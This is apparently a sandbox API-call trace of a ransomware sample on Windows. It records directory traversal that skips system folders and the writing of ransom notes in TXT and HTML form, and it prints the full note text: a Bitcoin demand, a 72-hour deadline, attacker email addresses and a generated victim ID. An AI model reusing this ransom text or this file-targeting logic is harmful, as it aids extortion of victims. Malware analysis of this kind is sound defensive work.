	[0169.504] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\*.*", cchLength=0x32 | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*") returned 0x32
	[0169.504] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.504] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="windows") returned 0x0
	[0169.505] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.505] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="boot") returned 0x0
	[0169.505] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.505] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="system volume information") returned 0x0
	[0169.505] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.505] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0169.506] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.506] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="temp") returned 0x0
	[0169.506] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.506] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="program files") returned 0x0
	[0169.506] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.506] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="program files (x86)") returned 0x0
	[0169.507] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.507] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="appdata") returned 0x0
	[0169.507] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.507] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="application data") returned 0x0
	[0169.507] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.507] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="winnt") returned 0x0
	[0169.508] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.508] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="tmp") returned 0x0
	[0169.508] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.508] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="cache") returned 0x0
	[0169.508] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.508] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="temporary internet files") returned 0x0
	[0169.509] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.509] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="webcache") returned 0x0
	[0169.509] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.577] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="inetcache") returned 0x0
	[0169.577] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.578] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="nvidia") returned 0x0
	[0169.578] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.578] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="packages") returned 0x0
	[0169.578] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.578] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="cookies") returned 0x0
	[0169.578] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.578] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="programdata") returned 0x0
	[0169.579] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0169.579] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0169.579] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7e8f849f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0169.579] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0169.579] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e8f849f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e8f849f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e8f849f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0169.579] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e8d2282, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e8d2282, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e8d2282, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0169.579] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e8d2282, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e8d2282, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e8d2282, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0169.580] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0169.580] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0169.580] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoftLanding", cAlternateFileName="SOFTLA~1")) returned 1
	[0169.580] lstrcmpW (lpString1="SoftLanding", lpString2="..") returned 1
	[0169.580] lstrcmpW (lpString1="SoftLanding", lpString2=".") returned 1
	[0169.581] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis"
	[0169.581] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\"
	[0169.581] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\", lpString2="SoftLanding" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding"
	[0169.581] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding"
	[0169.581] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\"
	[0169.581] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\"
	[0169.581] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\*.*"
	[0169.581] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0169.582] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\*.*") returned 54
	[0169.582] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0169.583] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\*.*", cchLength=0x36 | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*") returned 0x36
	[0169.583] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.583] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="windows") returned 0x0
	[0169.583] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.583] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="boot") returned 0x0
	[0169.583] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.583] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="system volume information") returned 0x0
	[0169.584] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.584] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0169.584] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.584] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="temp") returned 0x0
	[0169.584] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.584] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="program files") returned 0x0
	[0169.585] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.585] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="program files (x86)") returned 0x0
	[0169.585] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.585] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="appdata") returned 0x0
	[0169.585] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.585] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="application data") returned 0x0
	[0169.585] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.586] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="winnt") returned 0x0
	[0169.586] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.586] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="tmp") returned 0x0
	[0169.586] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.586] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="cache") returned 0x0
	[0169.586] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.586] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="temporary internet files") returned 0x0
	[0169.587] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.587] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="webcache") returned 0x0
	[0169.587] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.587] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="inetcache") returned 0x0
	[0169.591] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.591] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="nvidia") returned 0x0
	[0169.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.592] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="packages") returned 0x0
	[0169.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.592] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="cookies") returned 0x0
	[0169.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.592] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="programdata") returned 0x0
	[0169.593] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0169.593] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0169.593] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0169.593] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0169.594] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding"
	[0169.594] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\*.*"
	[0169.594] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0169.594] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0169.594] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\HELP_DECRYPT_YOUR_FILES.TXT") returned 78
	[0169.594] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0169.596] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0169.596] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0169.599] CloseHandle (hObject=0x388) returned 1
	[0169.600] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0169.600] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0169.601] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0169.602] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0169.602] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0169.602] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0169.603] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0169.603] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0169.604] CloseHandle (hObject=0x388) returned 1
	[0169.604] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0169.604] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0169.605] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0169.605] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\HELP_DECRYPT_YOUR_FILES.HTML") returned 79
	[0169.605] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0169.605] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0169.606] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0169.610] CloseHandle (hObject=0x388) returned 1
	[0169.610] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0169.611] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0169.611] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0169.611] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0169.613] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0169.613] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0169.613] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0169.613] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0169.614] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0169.614] CloseHandle (hObject=0x388) returned 1
	[0169.614] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7ea033c6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0169.615] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\*.*") returned 54
	[0169.615] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0169.615] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\*.*", cchLength=0x36 | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*") returned 0x36
	[0169.615] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.615] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="windows") returned 0x0
	[0169.616] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.616] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="boot") returned 0x0
	[0169.616] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.616] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="system volume information") returned 0x0
	[0169.616] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.616] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0169.616] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
